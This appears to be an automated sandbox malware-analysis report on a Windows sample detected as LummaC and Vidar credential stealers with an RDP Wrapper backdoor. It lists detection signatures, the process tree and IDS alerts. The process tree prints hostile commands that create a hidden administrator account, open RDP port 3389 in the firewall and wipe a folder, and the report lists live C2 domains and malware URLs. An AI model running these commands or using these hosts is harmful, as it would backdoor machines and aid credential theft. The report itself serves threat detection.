Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1519759
MD5:f73186df5a030cf7f186b0737c3af1f7
SHA1:d15e45feefbbc010db92ae897d80bc7419c0d046
SHA256:05c67a9765fe1ebebcedaee376f87a803d7cd37e6c5c19f7d336c2f14a4ef207
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a new user with administrator rights
Allocates memory in foreign processes
Allows multiple concurrent remote connection
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Enables remote desktop connection
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Modifies the windows firewall
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Sigma detected: Suspicious Add User to Remote Desktop Users Group
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4108 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)
    • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • IDBAFHDGDG.exe (PID: 6044 cmdline: "C:\ProgramData\IDBAFHDGDG.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)
        • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 1220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • GIIIIJDHJE.exe (PID: 3652 cmdline: "C:\ProgramData\GIIIIJDHJE.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)
        • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 1144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • AFHDGDGIID.exe (PID: 3396 cmdline: "C:\ProgramData\AFHDGDGIID.exe" MD5: 8C46913FBA5CA6A0CB8C4E839EF3A3AE)
        • cmd.exe (PID: 1312 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6608 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 6744 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 6504 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • RDPWInst.exe (PID: 3168 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
            • netsh.exe (PID: 3524 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • cmd.exe (PID: 5416 cmdline: "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 1620 cmdline: net user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 6008 cmdline: C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 2032 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5076 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 5568 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 3488 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 6244 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 6464 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6476 cmdline: net localgroup "Administrators" RDPUser_fec8106a /add MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 6488 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
        • cmd.exe (PID: 6644 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6804 cmdline: net localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: 31890A7DE89936F922D44D677F681A7F)
            • net1.exe (PID: 6856 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • cmd.exe (PID: 932 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3284 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["ghostreedmnu.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "fragnantbui.shop", "reinforcenh.shop", "gutterydhowi.shop", "drawzhotdog.shop", "offensivedzvju.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\AFHDGDGIID.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
          C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            SourceRuleDescriptionAuthorStrings
            0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      Click to see the 21 entries
                      SourceRuleDescriptionAuthorStrings
                      2.2.RegAsm.exe.400000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        2.2.RegAsm.exe.400000.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                          8.2.RegAsm.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                            8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                              2.2.RegAsm.exe.400000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                                Click to see the 10 entries

                                System Summary

                                barindex
                                Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\ProgramData\AFHDGDGIID.exe, Initiated: true, ProcessId: 3396, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49784
                                Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 3168, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\AFHDGDGIID.exe" , ParentImage: C:\ProgramData\AFHDGDGIID.exe, ParentProcessId: 3396, ParentProcessName: AFHDGDGIID.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add, ProcessId: 6644, ProcessName: cmd.exe
                                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                                Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, CommandLine: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5416, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_fec8106a DlRcmVQWc0I6 /add, ProcessId: 1620, ProcessName: net.exe
                                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\ProgramData\AFHDGDGIID.exe, QueryName: api.ipify.org
                                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6608, ProcessName: net.exe
                                Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1312, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6608, ProcessName: net.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:14:28.857369+020020287653Unknown Traffic192.168.2.4497405.75.211.162443TCP
                                2024-09-27T00:14:30.047301+020020287653Unknown Traffic192.168.2.4497415.75.211.162443TCP
                                2024-09-27T00:14:31.424414+020020287653Unknown Traffic192.168.2.4497425.75.211.162443TCP
                                2024-09-27T00:14:32.792950+020020287653Unknown Traffic192.168.2.4497435.75.211.162443TCP
                                2024-09-27T00:14:34.149527+020020287653Unknown Traffic192.168.2.4497445.75.211.162443TCP
                                2024-09-27T00:14:35.562421+020020287653Unknown Traffic192.168.2.4497455.75.211.162443TCP
                                2024-09-27T00:14:36.581589+020020287653Unknown Traffic192.168.2.4497465.75.211.162443TCP
                                2024-09-27T00:14:39.706116+020020287653Unknown Traffic192.168.2.4497475.75.211.162443TCP
                                2024-09-27T00:14:40.918817+020020287653Unknown Traffic192.168.2.4497485.75.211.162443TCP
                                2024-09-27T00:14:41.930442+020020287653Unknown Traffic192.168.2.4497495.75.211.162443TCP
                                2024-09-27T00:14:43.074730+020020287653Unknown Traffic192.168.2.4497505.75.211.162443TCP
                                2024-09-27T00:14:44.107022+020020287653Unknown Traffic192.168.2.4497515.75.211.162443TCP
                                2024-09-27T00:14:45.825014+020020287653Unknown Traffic192.168.2.4497525.75.211.162443TCP
                                2024-09-27T00:14:47.539254+020020287653Unknown Traffic192.168.2.4497535.75.211.162443TCP
                                2024-09-27T00:14:49.077562+020020287653Unknown Traffic192.168.2.4497545.75.211.162443TCP
                                2024-09-27T00:14:50.619616+020020287653Unknown Traffic192.168.2.4497555.75.211.162443TCP
                                2024-09-27T00:14:52.789705+020020287653Unknown Traffic192.168.2.4497565.75.211.162443TCP
                                2024-09-27T00:14:55.766830+020020287653Unknown Traffic192.168.2.4497575.75.211.162443TCP
                                2024-09-27T00:14:56.945373+020020287653Unknown Traffic192.168.2.4497585.75.211.162443TCP
                                2024-09-27T00:14:58.287500+020020287653Unknown Traffic192.168.2.4497595.75.211.162443TCP
                                2024-09-27T00:14:59.736675+020020287653Unknown Traffic192.168.2.4497605.75.211.162443TCP
                                2024-09-27T00:15:01.765713+020020287653Unknown Traffic192.168.2.4497625.75.211.162443TCP
                                2024-09-27T00:15:03.802303+020020287653Unknown Traffic192.168.2.4497635.75.211.162443TCP
                                2024-09-27T00:15:07.750779+020020287653Unknown Traffic192.168.2.4497655.75.211.162443TCP
                                2024-09-27T00:15:09.941873+020020287653Unknown Traffic192.168.2.4497695.75.211.162443TCP
                                2024-09-27T00:15:12.068341+020020287653Unknown Traffic192.168.2.4497725.75.211.162443TCP
                                2024-09-27T00:15:13.690540+020020287653Unknown Traffic192.168.2.4497755.75.211.162443TCP
                                2024-09-27T00:15:41.429971+020020287653Unknown Traffic192.168.2.4497875.75.211.162443TCP
                                2024-09-27T00:15:42.919658+020020287653Unknown Traffic192.168.2.4497885.75.211.162443TCP
                                2024-09-27T00:15:44.282336+020020287653Unknown Traffic192.168.2.4497895.75.211.162443TCP
                                2024-09-27T00:15:45.645028+020020287653Unknown Traffic192.168.2.4497905.75.211.162443TCP
                                2024-09-27T00:15:46.991366+020020287653Unknown Traffic192.168.2.4497915.75.211.162443TCP
                                2024-09-27T00:15:48.434558+020020287653Unknown Traffic192.168.2.4497925.75.211.162443TCP
                                2024-09-27T00:15:49.449684+020020287653Unknown Traffic192.168.2.4497935.75.211.162443TCP
                                2024-09-27T00:15:52.774428+020020287653Unknown Traffic192.168.2.4497945.75.211.162443TCP
                                2024-09-27T00:15:53.759540+020020287653Unknown Traffic192.168.2.4497955.75.211.162443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:08.133125+020020546531A Network Trojan was detected192.168.2.449766104.21.36.139443TCP
                                2024-09-27T00:15:09.096642+020020546531A Network Trojan was detected192.168.2.449767104.21.4.136443TCP
                                2024-09-27T00:15:10.034198+020020546531A Network Trojan was detected192.168.2.449768188.114.97.3443TCP
                                2024-09-27T00:15:11.283870+020020546531A Network Trojan was detected192.168.2.449770188.114.96.3443TCP
                                2024-09-27T00:15:12.490926+020020546531A Network Trojan was detected192.168.2.449771188.114.97.3443TCP
                                2024-09-27T00:15:13.438318+020020546531A Network Trojan was detected192.168.2.449773172.67.162.108443TCP
                                2024-09-27T00:15:14.346648+020020546531A Network Trojan was detected192.168.2.449776188.114.96.3443TCP
                                2024-09-27T00:15:16.089236+020020546531A Network Trojan was detected192.168.2.449777188.114.97.3443TCP
                                2024-09-27T00:15:18.168845+020020546531A Network Trojan was detected192.168.2.449779172.67.208.139443TCP
                                2024-09-27T00:15:20.558599+020020546531A Network Trojan was detected192.168.2.449781172.67.128.144443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:08.133125+020020498361A Network Trojan was detected192.168.2.449766104.21.36.139443TCP
                                2024-09-27T00:15:09.096642+020020498361A Network Trojan was detected192.168.2.449767104.21.4.136443TCP
                                2024-09-27T00:15:10.034198+020020498361A Network Trojan was detected192.168.2.449768188.114.97.3443TCP
                                2024-09-27T00:15:11.283870+020020498361A Network Trojan was detected192.168.2.449770188.114.96.3443TCP
                                2024-09-27T00:15:12.490926+020020498361A Network Trojan was detected192.168.2.449771188.114.97.3443TCP
                                2024-09-27T00:15:13.438318+020020498361A Network Trojan was detected192.168.2.449773172.67.162.108443TCP
                                2024-09-27T00:15:14.346648+020020498361A Network Trojan was detected192.168.2.449776188.114.96.3443TCP
                                2024-09-27T00:15:16.089236+020020498361A Network Trojan was detected192.168.2.449777188.114.97.3443TCP
                                2024-09-27T00:15:18.168845+020020498361A Network Trojan was detected192.168.2.449779172.67.208.139443TCP
                                2024-09-27T00:15:20.558599+020020498361A Network Trojan was detected192.168.2.449781172.67.128.144443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:12.983938+020020561571Domain Observed Used for C2 Detected192.168.2.449773172.67.162.108443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:13.935923+020020561551Domain Observed Used for C2 Detected192.168.2.449776188.114.96.3443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:09.585800+020020561631Domain Observed Used for C2 Detected192.168.2.449768188.114.97.3443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:08.654623+020020561651Domain Observed Used for C2 Detected192.168.2.449767104.21.4.136443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:10.771432+020020561611Domain Observed Used for C2 Detected192.168.2.449770188.114.96.3443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:16.707368+020020561511Domain Observed Used for C2 Detected192.168.2.449779172.67.208.139443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:14.911440+020020561531Domain Observed Used for C2 Detected192.168.2.449777188.114.97.3443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:11.885423+020020561591Domain Observed Used for C2 Detected192.168.2.449771188.114.97.3443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:07.669123+020020561771Domain Observed Used for C2 Detected192.168.2.449766104.21.36.139443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:16.084795+020020544951A Network Trojan was detected192.168.2.44977845.132.206.25180TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:12.494857+020020561561Domain Observed Used for C2 Detected192.168.2.4646981.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:13.448159+020020561541Domain Observed Used for C2 Detected192.168.2.4634601.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:09.100767+020020561621Domain Observed Used for C2 Detected192.168.2.4629771.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:08.163096+020020561641Domain Observed Used for C2 Detected192.168.2.4518771.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:10.038406+020020561601Domain Observed Used for C2 Detected192.168.2.4562401.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:16.207474+020020561501Domain Observed Used for C2 Detected192.168.2.4651081.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:14.396934+020020561521Domain Observed Used for C2 Detected192.168.2.4518591.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:11.287488+020020561581Domain Observed Used for C2 Detected192.168.2.4499811.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:07.166816+020020561761Domain Observed Used for C2 Detected192.168.2.4525681.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:14:33.488655+020020442471Malware Command and Control Activity Detected5.75.211.162443192.168.2.449743TCP
                                2024-09-27T00:15:46.345317+020020442471Malware Command and Control Activity Detected5.75.211.162443192.168.2.449790TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:14:34.838625+020020518311Malware Command and Control Activity Detected5.75.211.162443192.168.2.449744TCP
                                2024-09-27T00:15:47.697227+020020518311Malware Command and Control Activity Detected5.75.211.162443192.168.2.449791TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:14:32.132983+020020490871A Network Trojan was detected192.168.2.4497425.75.211.162443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:35.086446+020028033053Unknown Traffic192.168.2.449783104.26.13.20580TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-27T00:15:06.278834+020028032702Potentially Bad Traffic192.168.2.449764147.45.44.10480TCP
                                2024-09-27T00:15:08.898249+020028032702Potentially Bad Traffic192.168.2.449764147.45.44.10480TCP
                                2024-09-27T00:15:11.279313+020028032702Potentially Bad Traffic192.168.2.449764147.45.44.10480TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                                Source: https://5.75.211.162/CGDHJEGHJAvira URL Cloud: Label: malware
                                Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9eAvira URL Cloud: Label: malware
                                Source: https://5.75.211.162/V3Avira URL Cloud: Label: malware
                                Source: https://5.75.211.162/sqlp.dllIAvira URL Cloud: Label: malware
